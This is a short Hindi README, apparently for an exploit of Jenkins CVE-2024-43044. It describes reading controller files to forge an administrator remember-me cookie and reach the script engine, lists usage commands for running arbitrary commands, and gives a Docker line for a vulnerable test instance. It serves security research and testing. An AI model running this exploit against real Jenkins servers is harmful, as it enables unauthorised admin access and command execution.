
Jenkins में भेद्यता CVE-2024-43044 का शोषण
यह CVE-2024-43044 के लिए एक शोषण है, एक मनमाना फ़ाइल पढ़ने की क्षमता जो एजेंट को नियंत्रक से फ़ाइलें लाने की अनुमति देती है।
शोषण भेद्यता का उपयोग करके फ़ाइलों को पढ़कर एक व्यवस्थापक खाते के लिए रिमेम्बर-मी कुकी बनाएगा और जेन्किन्स स्क्रिप्टिंग इंजन तक पहुँच प्राप्त करेगा।
पूर्ण लेख https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/ पर देखें।
mvn package
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
आप इसे कमजोर संस्करण में डॉकर का उपयोग करके परीक्षण कर सकते हैं:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
एक बार जब आपके पास जेन्किन्स चल रहा हो, तो एक एजेंट सेटअप करें।
नियंत्रक/एजेंट कनेक्शन डिफ़ॉल्ट (यूआरएल, नोडनाम, सीक्रेट का उपयोग करके) या SSH के माध्यम से हो सकता है।
.